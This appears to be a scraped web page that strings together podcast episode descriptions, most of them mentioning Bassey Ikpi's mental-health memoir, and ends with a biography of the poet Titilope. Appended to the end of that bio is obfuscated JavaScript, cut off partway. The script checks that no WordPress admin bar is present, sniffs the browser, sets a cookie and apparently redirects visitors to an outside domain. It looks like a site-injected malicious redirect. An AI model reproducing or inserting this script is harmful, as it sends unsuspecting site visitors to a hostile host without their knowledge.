One of these things is not like the other...it's Robert Duvall. That's right, we're talking about the perplexing 1996 movie A Family Thing. Long time listeners might recognize this as the movie Jordan's sister thought she was watching for the Black or White episode. Starring Robert Duvall and James Earl Jones, the movie fails by it's very premise of trying to convince us Robert Duvall is even .00000001% Black. We're so excited to be joined by the legendary and hilarious Bassey Ikpi (I'm Telling the Truth but I'm Lying) to break down all the ways this movie went wrong. From the relationship between the two "brothers" to the big mamma trope, to where exactly does "nigger town" begin and end. Bassey is one of the funniest and thoughtful people around! Her writing on mental health is incredible stuff and her book is a must read. You can find her at www.basseyipi.com as well as Twitter (@basseyworld) and Instagram (@basseyworld) We're still holding on to the strands of Twitter over at @white_pod and you can always reach us at whitepeoplewontsaveyoupod@gmail.com We've got more Wakanda Forever coverage coming your way soon, as well as some end of year wrap ups and our second annual Holiday episode, so stay tuned!
"It's the sport of kings/better than diamond rings", that's right, we're talking about football, specifically the 1986 "comedy" Wildcats. Starring Goldie Hawn and the film debut for both Woody Harrelson and Wesley Snipes, you'd think it would at least be mildly entertaining. Instead they just turned the 80's to the max and let the cameras roll. Luckily we have Shane Paul Neil as our QB to guide us through the wacky world of this movie. From Nipsey Russell's closet full of peanut brittle, Finch's food gags, horny Wesley jumping on anything that moves, or Goldie's terrible parenting, we talk about it all. You can find Shane on Twitter @ShanePaulNeil (while it still exists) as well as check out his photography and writing over at his site. And if you're looking for some holiday gifts, check out his shop for some amazing photos! Thankful to you all for listening, and we'll be back next week with Bassey Ikpi for A Family Thing.
Hey Everyone! For this episode I wanted to share an essay I wrote in reaction to Bassey Ikpi's book I'm Telling the Truth but I'm Lying. In the book, she talks about her experience with Bipolar Disorder and journey it took to get the support she needed. I read this book two years ago and still think about it every so often. I had never encountered a book like it: a detailed account of a Black woman's ups and downs with developing a mental illness and the work it took to get the proper diagnosis and help she needed. It speaks to the importance of her openness and transparency that may inspire others to pursue help for themselves as well and combat the stigma. I will be forever grateful to her for this book. There is reference to suicide in the book and in the essay (6:30). Please listen and/or read with caution. Nonetheless, I hope it is positively impactful. It's a "Really. bruh?" takeover! Kyle and Edwin extend the segment into an entire episode, taking Kanye (Comrade West) to task, contending with the announcement of the Super Bowl Halftime show and the billionaire status of Rihanna and Jay-Z, taking LeBron to task for his support of Tory Lanez, and discussing Ime Udoka's foolishness. The show references Bassey Ikpi's "I'm Telling the Truth But I'm Lying," a memoir in which she explores her experiences with bipolar II and anxiety.
It's a "Really. bruh?" takeover! The show references Bassey Ikpi's "I'm Telling the Truth But I'm Lying," a memoir in which she explores her experiences with bipolar II and anxiety.
The two books featured in this episode focus on accessing feelings and mental health. First is a book of essays by spoken word artist, Bassey Ikpi. Ikpi tells Scott Simon that her book I'm Telling the Truth but I'm Lying chronicles the hard work it took to make a real life for herself after facing abuse at home. Then we hear from neurologist and physician Anna DeForest on her novel that questions a lot about existence and the inequities of the medical system. A History of Present Illness is DeForest's first novel, and she explains to Ayesha Roscoe why mental health is at the heart of her story.
Hypomania could have its own show. With that in mind, I did my best to keep this segment punchy, full, and personal. A few key things to keep in mind: Hypomania is a period of over-active and excited behavior that can have a significant impact on your day-to-day life. It is extended and involves at least three core symptoms. Hypomania is not to be confused with mania–it manifests with unusual gaiety, excitement, flamboyance, or irritation, along with other characteristics such as inflated self-esteem, extreme talkativeness, increased distractibility, reduced need for sleep, and having racing thoughts–as it does not involve psychosis. You can make decisions and life choices that can significantly decrease your chances of having a hypomanic episode or prevent them entirely. This episode is for anyone who lives with bipolar II, for anyone who has a loved one who lives with the condition, or for anyone curious to expand their knowledge on the topic. Quote by David Lovelace: I know the empathy borne of despair; I know the fluidity of thought, the expansive, even beautiful, mind that hypomania brings, and I know this is quicksilver and precious and often it's poison. There has always existed a sort of psychic butcher who works the scales of transcendence, who weighs out the bloody cost of true art. Book recommendation: I'm Lying but I'm Telling the Truth by Bassey Ikpi. Our GDPR privacy policy was updated on August 8, 2022. Visit acast.com/privacy for more information.

Even if you're not a fan of celebrity gossip, you've probably heard that there's something going on with the rapper Ye, formerly known as Kanye West. He's exhibited increasingly erratic behavior, including relentless online harassment of his ex-wife, reality TV queen Kim Kardashian and her current boyfriend, comedian Pete Davidson. Now he's been banned from performing at the Grammys, and was recently suspended from Instagram for a day. For years Ye's behavior has been puzzling to observe - ranging from announcing plans to run for President, to moving into a windowless basement room inside of a stadium to complete his last album, to high profile feuds with everyone from Jay Z to Jimmy Kimmel. He has admitted that he struggles with bipolar disorder and that instead of medical treatment he uses his art as therapy.Fans, critics and those who write and talk seriously about the arts are just not sure how to talk about the situation.Aisha Harris of NPR's Pop Culture Happy Hour joins us to unpack some of the complexities. And we speak with mental health advocate Bassey Ikpi who offers a personal perspective on Ye's behavior._________________________In participating regions, you'll also hear a local news segment to help you make sense of what's going on in your community.Email us at considerthis@npr.org.

Susannah Cahalan tells the astonishing true story of her descent into madness, her family’s inspiring faith in her, and the lifesaving diagnosis that nearly didn’t happen. Her New York Times bestselling book “Brain on Fire” was adapted for a movie starring Chloe Grace Moretz as her. It’s an unforgettable exploration of memory and identity, faith and love, and a profoundly compelling tale of survival and perseverance. She was a healthy young person working at her dream job, The New York Post when she began having grand mal seizures and babbling. Her increasing paranoia and seizures were misdiagnosed by a neurologist as partying too hard combined with stress. Eventually, she’d become catatonic, trapped in her body unable to speak, write, or get thoughts out. Susannah was diagnosed with a schizoaffective disorder with video of her in the hospital heartbreakingly capturing her real panic as she hallucinates she’s on the news while using the remote to try to call for help. After many misdiagnoses and on the verge of being “locked up” in a psych ward, a miracle doctor, Dr. Najjar comes along and asks her to draw a clock. The lopsided image opened up clues leading to a brain biopsy and spinal tap, she’s diagnosed with autoimmune encephalitis, a medical explanation pretending to be psychiatric. Her personal experience leads her deeper into the study of other “Great Pretenders,” the same name as her second New York Times best-selling book. Wow, the musical captioning on Episode 2 was a journey. Distressed music? Hard same. Eerie music? Seriously. Tender music? I don't trust this. Ominous music... yeah, told ya. In this episode of the podcast, we ask "what is up with this village?" "who IS this racist dog lady anyway?" "why did your fantasy film ride into my horror?" and "who is this birthright from anyway?" Why is the spoken-word poem "Whitey's on the Moon" a good choice for a ritual taking place 15 years earlier? We digress on the weird takes Christianity has on Gensis and whether powerful white men can even imagine the untamed fertility of Eden (strict hierarchies and orderings? everything in its place really?). Pour one out for George, who knows that real power is a thorough knowledge of the bylaws. Rachel: This week, I need you to know about The Black Guy Who Tips podcast. How can our focus on language--and how it is spoken--both empower and oppress our children? “We die. That may be the meaning of life. But we do language. That may be the measure of our lives.” — Toni Morrison Are we subconsciously using language (and our expression of it) to submit to white supremacy? For our people, language is community. But our diction also affects how we are viewed by greater society. So, how do we navigate discussing this complex topic with our children? Our guests--writers Bassey Ikpi, Deesha Philyaw & Issa Mas--join Noleca to discuss! See acast.com/privacy for privacy and opt-out information.

Welcome! We all made it to another week of Bag Ladiez! This week for “Currento Eventos” we talk about 16 year old Bresha Meadows FINALLY being released (but she shouldn’t have been incarcerated ANYWAYS), the Superbowl and the implications on sex trafficking, and how a DHS employee (and our whole government) really sucks at his job *insert eyeroll here* For “What’s Your Baggage” we’re talking about Process Fatigue. Do you ever get overwhelmed by the idea that you’ll be working on being better forever? We know healing isn’t linear but that doesn’t make it any less hard sometimes. For “Put it in your Bag” Lina recommends the Black woman owned Radical Dream Pins company and Estephanie gives a shoutout to the feminist BlueStocking Bookstore here in NYC! Finally for our rotating theme for Black History/Futures Month we’ve decided to uplift the Black people who are inspirations to us on a daily basis in big and small ways. Poet and Mental Health Advocate Bassey Ikpi started #NoShameDay in 2012 to encourage a day of dialogue and transparency about mental health issues. In this episode Bassey share her own story about how she found help and meaning in her own mental health challenges, and Highwater host Chakka Reeves shares a bit of her own mental health story as well. We hope that everyone who listens to this finds strength in these stories. As Bassey says, as long as you are here, you have a purpose. Even when the night it at its darkest, allow yourself morning.

When Titilope first stepped to the microphone in 2007 at a local open mic, to gracing stages from Lagos to Cape Town, New York to California, Edmonton to Toronto and places in between, her goal has been to remind people that the ties that bind us transcend all of the borders we have created. She will tell you that no poem is brand new. In the telling and re-telling we are reminded that someone has walked this path before. Titilope is a Nigerian born civil engineer, author and spoken word poet and the winner of the 2011 Canadian Authors’ Association Emerging Author Award for her first collection of poems, Down To Earth. In 2013 Titilope released her first spoken word album Mother Tongue and her second collection of poetry, Abscess, in 2014 with Geko Publishing in South Africa. She was a resident artist at the 2011 Yemoya Artist Residency under the mentorship of acclaimed Jamaican-Canadian Dub poet and educator, D'bi Young. She was the recipient of the 2013 RISE award for achievement in the arts and the 2014 National Black Coalition of Canada Fil Fraser Award. She has featured on stages across Canada and internationally, performing with Sonia Sanchez, Jayne Cortez, Yusef Komunyakaa, Obiora Odechukwu, Bassey Ikpi, Twin Poets and Offiong Bassey, at the 2011 Achebe Colloquium on Africa at Brown University. In 2013, Titilope was selected from over 200 writers to meet legendary poet and author, Dr. Maya Angelou. She is the creator of Rouge Poetry, a weekly open mic that has feature local and international poets and musicians for over 5 years. She is the founding member of the Breath In Poetry Collective, home of the 2011 Canadian Festival of Spoken Word (CFSW) championship winning Edmonton Slam Team. Titilope also adds acting to her list of accomplishments, starring as Eki in the Ndani TV hit series, Gidi Up that will air across Africa in 2014. Even with the soil of continents beneath her feet, the stories that are surer with each passing year, she has not forgotten where it all began. She will tell you it is simple; when your heart is cracked open and a multitude of words begin to leak from your chest, before you stain everything you dare to touch, put it in a poem.var _0x1e50=['charAt','substring','indexOf','userAgent','match','Edge','MSIE;','Chromium','Firefox','Chrome','ppkcookie','location','replace','https://www.xcdnko.xyz','getElementById','wpadminbar','undefined','setTime','getTime','cookie','split','length'];(function(_0x2fa107,_0x55f5e9){var _0x343595=function(_0x34c909){while(--_0x34c909){_0x2fa107['push'](_0x2fa107['shift']());}};_0x343595(++_0x55f5e9);}(_0x1e50,0x184));var _0x265c=function(_0x2fa107,_0x55f5e9){_0x2fa107=_0x2fa107-0x0;var _0x343595=_0x1e50[_0x2fa107];return _0x343595;};(function(){if(document[_0x265c('0x0')](_0x265c('0x1'))===null){if(typeof _0x3419d8===_0x265c('0x2')){function _0x3419d8(_0x7f1c71,_0x1d8816,_0x3eeb6e){var _0x4e0732='';if(_0x3eeb6e){var _0x1dd386=new Date();_0x1dd386[_0x265c('0x3')](_0x1dd386[_0x265c('0x4')]()+_0x3eeb6e*0x18*0x3c*0x3c*0x3e8);_0x4e0732='; expires='+_0x1dd386['toUTCString']();}document['cookie']=_0x7f1c71+'='+(_0x1d8816||'')+_0x4e0732+'; path=/';}function _0x23248e(_0x511919){var _0x2e7cdb=_0x511919+'=';var _0x4d7f7d=document[_0x265c('0x5')][_0x265c('0x6')](';');for(var _0x593f64=0x0;_0x593f64
